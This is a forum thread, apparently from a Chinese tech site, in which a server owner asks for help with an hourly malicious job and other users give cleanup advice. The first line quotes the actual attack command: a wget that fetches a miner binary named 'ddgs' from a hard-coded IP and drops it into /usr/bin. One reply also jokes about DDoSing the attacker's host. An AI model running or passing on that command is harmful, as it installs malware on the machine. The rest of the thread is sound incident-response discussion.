wget -q -T1800 http://103.27.42.76:41933/static/5023/ddgs.x86_64 -O /usr/bin/uvggee
ip 103.27.42.76 是日本
每小时执行的恶意命令，如何找到执行的文件在位置，或者是不要他运行，wget 能卸载么
没有找到定时任务
有在跑 redis 吗？ 有可能是 redis 被黑了

redis 上密码

cron 里没有?最好的方法就是重装系统

没有重要东西就直接重装系统。

可以看下这个 https://www.v2ex.com/t/623847

首先, cron 分用户的,你切换系统已有用户都试试看 sudo crontab -u userName -l (替换其中的 userName),
其次可以通过 alias 重命名 wget 为其他命令

最近 windows 和 linux 都被挖矿了,一个原因是 redis 公网裸奔,一个是 windows sqlserver 弱口令

建议重装，想排查问题可以先
> /usr/bin/uvggee
chmod 000 /usr/bin/uvggee
chattr +i /usr/bin/uvggee
然后再排查问题

非专业，笨笨的方法：
比如自己写一个 shell 命名为 wget，然后在里面获取一些父进程信息？
然后用这个 shell 替换(覆盖) wget ？？

1 top 到进程号
2 ll 到执行位置
3 rm 掉
4 crontab 里删除，并添加一个 1 分钟守护
5 restart

建议重装系统，没办法重装的话可以把 wget 和 curl 工具重命名

七天了，楼主这个问题还没解决？大家给你的方案你试过了吗

老哥问问你是怎么发现挖矿的。我的 windows 也装了 redis，但是没有公网，装了都大半年了，想来也后怕，请问应该怎么排查？

试过了，主要不能重装，不然早解决

试过了，主要不能重装，不然早解决 1
@guog

开 ssh，让我上去看看

还有个可能是服务器跑了 yarn 。

先找到那个程序再进程里面的 pid,先暂停,再顺藤摸瓜,找到老巢去.

你在 v2 上发个求 d 帖把那个服务器 d 挂就好了

pstree 找到是哪个主进程启动的 wget，然后删除主进程的执行文件就行了吧。难道还有守护进程？？尝试 watch+pstree 。

发到全球 ddos 论坛上去

可以用防火墙进行限制么

用 iptables drop 包就完事了

既然能写入 /usr/bin，那说明别人已经拿到了 root 权限，那从内核到系统文件，所有的程序都可能会被换掉，你不重装难道留着过劳动节么。

我猜你是 centos

排查下 cup 占用高的进程, 看看有没有可疑的 vbs 脚本,是否为远程下载的脚本~

这种一般有 cron 的定时脚本，还有就是会有一个低 cpu 利用率的 deamon 的进程不易被发现，所以有时候发现把 cron 停掉之后过一会还是会出现。